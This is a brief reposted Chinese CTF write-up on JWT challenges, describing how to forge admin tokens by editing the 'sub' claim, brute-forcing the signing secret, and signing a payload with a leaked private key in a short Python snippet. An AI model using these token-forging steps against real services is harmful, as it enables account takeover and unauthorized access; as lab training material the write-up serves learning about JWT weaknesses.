jwt ctf

本文转载自查看原文 2021-06-12 09:04 185 CTF

345

将base64解密后的sub的值从user改为admin,然后重新导入cooike,访问/admin/即可

346

347

和上一题就多了一个爆破

348

还是爆破

349

私钥泄露

import jwt

public = open('private.key', 'r').read()
payload={"user":"admin"}
print(jwt.encode(payload, key=public, algorithm='RS256'))

然后post

350没环境不做了

https://xz.aliyun.com/t/2338

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 CTF 什么是CTF？ JWT [CTF] CTF入门指南 JWT-jwt是什么 *CTF——shellcode CTF介绍 CTF XSS 各种CTF的WP JWT Claims